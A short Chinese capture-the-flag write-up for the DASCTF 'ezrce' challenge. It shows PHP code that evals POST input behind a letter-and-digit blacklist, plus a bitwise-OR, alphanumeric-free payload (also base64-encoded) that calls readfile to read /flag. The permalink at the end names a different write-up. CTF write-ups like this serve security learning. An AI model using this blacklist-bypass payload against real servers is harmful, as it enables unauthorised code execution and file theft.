2020安恒DASCTF八月浪漫七夕战 ezrce Writeup

早上有点事差点忘了有比赛233

<?php
error_reporting(0);
show_source(__FILE__);
$code=$_POST['code'];
$_=array('a','b','c','d','e','f','g','h','i','j','k','m','n','l','o','p','q','r','s','t','u','v','w','x','y','z','@','\~','\^','\[','\]','\&','\?','\<','\>','\*','1','2','3','4','5','6','7','8','9','0');
//This blacklist is so stupid.
$blacklist = array_merge($_);
foreach ($blacklist as $blacklisted) {
    if (preg_match ('/' . $blacklisted . '/im', $code)) {
        die('you are not smart');
    }
}
eval("echo($code)");
?>

题目过滤了全部字母和数字和部分位运算符

由http头X-Powered-By: PHP/7.3.21可知服务器PHP版本为7.3.21

需要构造无字母数字的playload

虽然过滤了部分位运算符但还是漏了一个| 或运算

利用或运算符构造playload 调用readfile函数读取根目录flag
playload

code=('````````'|'	')('/````'|'/'));//
bas64
Y29kZT0oJ2BgYGBgYGBgJ3wnEgUBBAYJDAUnKSgnL2BgYGAnfCcvBgwBBycpKTsvLw==

fastjson绕过WAF的TIPS

记一次mysql盲注遇到的问题

本文作者：白帽酱

永久链接：https://rce.moe/2020/08/25/GeekPwn-2020-%E4%BA%91%E4%B8%8A%E6%8C%91%E6%88%98%E8%B5%9B-cosplay-writeup/